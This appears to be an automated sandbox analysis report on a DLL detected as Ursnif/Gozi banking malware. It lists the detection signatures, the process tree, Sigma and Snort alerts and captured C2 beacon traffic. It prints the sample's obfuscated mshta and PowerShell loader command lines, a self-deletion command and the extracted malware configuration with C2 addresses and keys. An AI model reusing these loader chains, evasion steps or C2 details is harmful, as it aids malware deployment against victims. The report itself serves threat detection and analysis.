Windows Analysis Report
VoevdOQpeU.dll

Overview

General Information

Sample Name: VoevdOQpeU.dll
Analysis ID: 614287
MD5: ba155d8aed7ca303fcfc3f0248d218e1
SHA1: 600453c21cdbecdbea9c825df4754b8a1829d649
SHA256: a5ea92139f59d185548e8f48d1ce65cbf54bf1e3e1930de221091017fd1d4f0a
Tags: dll, Gozi, ISFB, Ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Windows Shell File Write to Suspicious Folder
Writes to foreign memory regions
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Sigma detected: Suspicious Remote Thread Created
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 1428 cmdline: loaddll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 1796 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5292 cmdline: rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 6956 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 7132 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • WerFault.exe (PID: 3084 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5640 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 616 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 4144 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • mshta.exe (PID: 6532 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6612 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6788 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6804 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2392.tmp" "c:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6844 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6920 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B60.tmp" "c:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 4432 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\VoevdOQpeU.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 5388 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
  • cleanup
{"RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8,  *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}
Yara matches (memory dumps)
Source | Rule | Description | Author
00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
(15 further entries not shown)

Yara matches (unpacked PE files)
Source | Rule | Description | Author
2.3.rundll32.exe.48994a0.7.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
2.2.rundll32.exe.49f0000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
2.3.rundll32.exe.48994a0.7.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
2.3.rundll32.exe.4e7a4a0.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
2.3.rundll32.exe.4f26940.2.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
(2 further entries not shown)

                      System Summary

Source: File created | Author: Florian Roth | Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 6532, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Caches
Source: Thread created | Author: Nikita Nazarov, oscd.community | Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 6612, StartAddress: 2BC1580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 3616
Source: Thread created | Author: Perez Diego (@darkquassar), oscd.community | Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 6612, StartAddress: 2BC1580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 3616
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6532, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6612, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth | Data: Command: rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1796, ParentProcessName: cmd.exe, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1, ProcessId: 5292, ProcessName: rundll32.exe
Source: Process started | Author: Florian Roth | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6532, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6612, ProcessName: powershell.exe
Source: Process started | Author: juju4, Jonhnathan Ribeiro, oscd.community | Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 6956, ParentProcessName: control.exe, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 7132, ProcessName: rundll32.exe
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6612, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline, ProcessId: 6788, ProcessName: csc.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6612, TargetFilename: C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6532, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6612, ProcessName: powershell.exe
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132951679509388866.6612.DefaultAppDomain.powershell
Source: Process started | Author: frack113 | Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6612, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 6644, ProcessName: conhost.exe
Snort IDS alerts:
Timestamp: 04/23/22-08:12:19.910177 | SID: 2033203 | Source Port: 49766 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 04/23/22-08:12:21.823792 | SID: 2033203 | Source Port: 49766 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 04/23/22-08:11:59.593120 | SID: 2033203 | Source Port: 49760 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 04/23/22-08:12:20.776897 | SID: 2033203 | Source Port: 49766 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected

                      AV Detection

Source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: Ursnif {"RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}
Source: VoevdOQpeU.dll | ReversingLabs: Detection: 38%
Source: VoevdOQpeU.dll | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F3072 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError
Source: VoevdOQpeU.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: Binary string: ntdll.pdb | source: rundll32.exe, 00000002.00000003.370646090.0000000005D90000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\in\the\town\where\ahung.pdb | source: loaddll32.exe, 00000000.00000000.287938913.0000000000480000.00000002.00000001.01000000.00000003.sdmp, VoevdOQpeU.dll
Source: Binary string: ntdll.pdbUGP | source: rundll32.exe, 00000002.00000003.370646090.0000000005D90000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0580FCC0 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0580CE21 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05805A14 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0580591B wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree

                      Networking

Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49760 -> 13.107.42.16:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49760 -> 13.107.42.16:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49766 -> 146.70.35.138:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49766 -> 146.70.35.138:80
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 146.70.35.138 80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: Joe Sandbox View | ASN Name: TENET-1ZA
Source: Joe Sandbox View | IP Address: 146.70.35.138
Source: global traffic | HTTP traffic detected: GET /phpadmin/DRUYboFifxi6C3/_2BjVEcKiT1b8A_2BvMed/1ckh5D3V8MdKp2S2/SxMBQuJjSXDeW9Y/7fodbbXY21Jrsa2aXJ/S90Gqb_2B/KDYz_2F5NJsyx14KqPKz/ecUQVATr13lzZyN_2B_/2BoLTTXT06dmMNQURoEaga/M1AdtgAQJw1vj/q_2FSYWg/oo4zTjJDuzf2mz8BRfV3I9z/TX7m3RhRWd/LYr8gkK9WgmQ0jja9/kmBHLi0WTs_2/FFd4Km9NmRn/_2FUZ.src HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 146.70.35.138 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /phpadmin/GVoID0TbPRvLYlr7up2X9/gD2XQvRshzT0oIvQ/0mEtVI_2FJuzvKC/fbaZh1y3_2FnOqy8_2/B0Y8u0dqv/V11JJbfZHGLCQ043KVhZ/2j3FiaSLUSAIqnVTtEF/p_2F7mTRIgp_2F43j86HIJ/7JamWIlhMtaxW/Qv_2BsMI/GK_2BjMae66_2B0eWRxZare/pyglkGar6g/LD_2FkUNwRZVbFFyN/qmaS1_2FZd3W/iyocOp4EpCY/lkbOHJ4rs/yFlR4ppeN_2/FAS.src HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 146.70.35.138 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /phpadmin/Vo3V1ij8xfQAzbYEppxuGj/YfKBcB_2BiFsK/C5o_2FK1/LFX_2FAQmA1J0Gg2IGK0zii/Cqu4J51vDj/wlNBNCb18BPgk55aw/3DJofkjbHHw_/2F3O9t6XtUN/FhzyouLiXCH4qy/e6m_2F6Bp87emTDJkwB0B/GJSc0pfzfjLvMKIS/Fcz1B6FomHVea2H/3F6nRjbT0qghS0NNIb/kfO6CmRa0/E8U4GDXz2DXZU_2BDOzp/T84va5G8JnhB3/UMJfQ.src HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 146.70.35.138 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 146.70.35.138 (50 occurrences)
Source: rundll32.exe, 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: rundll32.exe, 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F4CC6 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError
                      Source: global trafficHTTP traffic detected: GET /phpadmin/DRUYboFifxi6C3/_2BjVEcKiT1b8A_2BvMed/1ckh5D3V8MdKp2S2/SxMBQuJjSXDeW9Y/7fodbbXY21Jrsa2aXJ/S90Gqb_2B/KDYz_2F5NJsyx14KqPKz/ecUQVATr13lzZyN_2B_/2BoLTTXT06dmMNQURoEaga/M1AdtgAQJw1vj/q_2FSYWg/oo4zTjJDuzf2mz8BRfV3I9z/TX7m3RhRWd/LYr8gkK9WgmQ0jja9/kmBHLi0WTs_2/FFd4Km9NmRn/_2FUZ.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
